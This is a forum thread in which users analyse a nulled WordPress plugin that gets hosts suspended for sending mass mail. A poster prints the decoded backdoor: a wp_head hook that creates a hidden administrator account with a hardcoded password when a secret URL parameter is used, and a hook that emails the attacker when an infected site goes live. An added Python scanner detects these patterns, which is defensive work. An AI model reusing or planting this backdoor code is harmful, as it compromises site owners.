Hi Anton!
Quotes from BHT!
"I installed this on a new domain and new hosting then it got suspended for sending 15 emails in a minute?
Code:
Suspended (Suspended user a2098155 for sending mass mail (15 emails were sent in 1 minute))
Can anyone explain why this theme and plugin would do this?
NOTE:
This WordPress install had ZERO other plugins installed."
"I'm guessing that the plugin shared here has an exploit/trojan which allows it to take over your server for mass spamming?"
Any ideas?
Nice obfuscated code :O
See the file "wp-content/plugins/azon-social-store/plugin.php"
$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72'); ....
I have an error on localhost for sending emails :O
Sorry but I am too curious to not check some obfuscated plugins :O
PHP Code:
add_action('wp_head', 'vgbt5ikola');
function vgbt5ikola()
{
    if ($_GET['cms'] == 'jjoplmh') {
        require('wp-includes/registration.php');
        if (!username_exists('wordpress')) {
            $user_id = wp_create_user('wordpress','gh67io9Cjm');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
add_action('wp_head', 'vbgt58iok');
function vbgt58iok()
{
    if (!username_exists('wordpress')) {
        $addressdecode='frogan@gmx.com';
        $vari='Wordpress Plugin Codes';
        mail($addressdecode,get_bloginfo('wpurl'),$vari);
    }
}
Same technique:
- When you access your site with this plugin installed, it mails "frogan@gmx.com" that a site with this infected plugin is live,
- Trying to access http://www.example.com?cms=jjoplmh, which creates a user called "wordpress" with admin rights,
- Does what he wants on your site
My Fix
- Download the plugin from OP, and install it
Mirror From OP :
- Replace the file plugin.php with mine (passworded)
Replace the file "wp-content/plugins/azon-social-store/plugin.php"
- Check for User "wordpress", delete it if exists
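A static check for the pattern described in the post above, as an added example that is not part of the original thread or of the plugin: it flags hook callbacks that create users, grant the administrator role, send mail or branch on request parameters, and also the `urldecode` loader style seen in plugin.php. The function names (`scan_php`, `function_body`) and the sample input with its callback names are constructed for illustration.

```python
import re
# Calls that have no business running inside a front-end hook callback.
RISKY = {
    "creates a user": re.compile(r"\bwp_create_user\s*\("),
    "grants administrator": re.compile(r"set_role\s*\(\s*['\"]administrator['\"]"),
    "sends mail": re.compile(r"(?<![\w>])(?:wp_)?mail\s*\("),
    "reads request parameter": re.compile(r"\$_(?:GET|POST|REQUEST)\b"),
}
HOOK = re.compile(r"add_action\s*\(\s*['\"](\w+)['\"]\s*,\s*['\"](\w+)['\"]")
# Loader style seen in plugin.php: $OOO000000=urldecode('%74%68...')
OBFUSCATED = re.compile(r"\$[O0_]{6,}\s*=\s*urldecode\s*\(\s*['\"](?:%[0-9a-fA-F]{2}){8,}")

def function_body(source, name):
    """Brace-balanced body of function `name` ('' if absent); braces in strings are not handled."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", source, re.I)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(source) and depth:
        depth += {"{": 1, "}": -1}.get(source[i], 0)
        i += 1
    return source[m.end():i - 1]

def scan_php(source):
    """List (hook, callback, reasons) for hooked callbacks doing risky things."""
    findings = []
    for hook, callback in HOOK.findall(source):
        body = function_body(source, callback)
        reasons = sorted(label for label, rx in RISKY.items() if rx.search(body))
        if reasons:
            findings.append((hook, callback, reasons))
    if OBFUSCATED.search(source):
        findings.append(("-", "-", ["urldecode-obfuscated loader"]))
    return findings

# Constructed sample: same shape as the snippet above, placeholder names/values.
SAMPLE = """
add_action('wp_head', 'cb_one');
function cb_one() { if ($_GET['k'] == 'v') { if (!username_exists('u')) {
  $id = wp_create_user('u', 'p'); $u = new WP_User($id); $u->set_role('administrator'); }}}
add_action('wp_head', 'cb_two');
function cb_two() { if (!username_exists('u')) { mail('x@example.invalid', 's', 'b'); }}
add_action('wp_footer', 'cb_ok');
function cb_ok() { echo '<!-- footer -->'; }
$OOO000000=urldecode('%74%68%36%73%62%65%68%71');
"""

if __name__ == "__main__":
    print(*scan_php(SAMPLE), sep="\n")
```

A hit is a reason to read the callback by hand, not proof of a backdoor; a clean result on an obfuscated file says nothing about what the decoded code does.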
thanks anton, very nice share...
Hmm, I was looking into why I don't have rights when I click on dashboard buttons, except for General Setup, and ...
Ouch, there is another OBFUSCATED file ... "wp-content/plugins/azon-social-store/modules/dashboard/init.php"
LOL
EDIT:
OK, weird, but it seems that this file is just obfuscated to protect the way it checks the license ...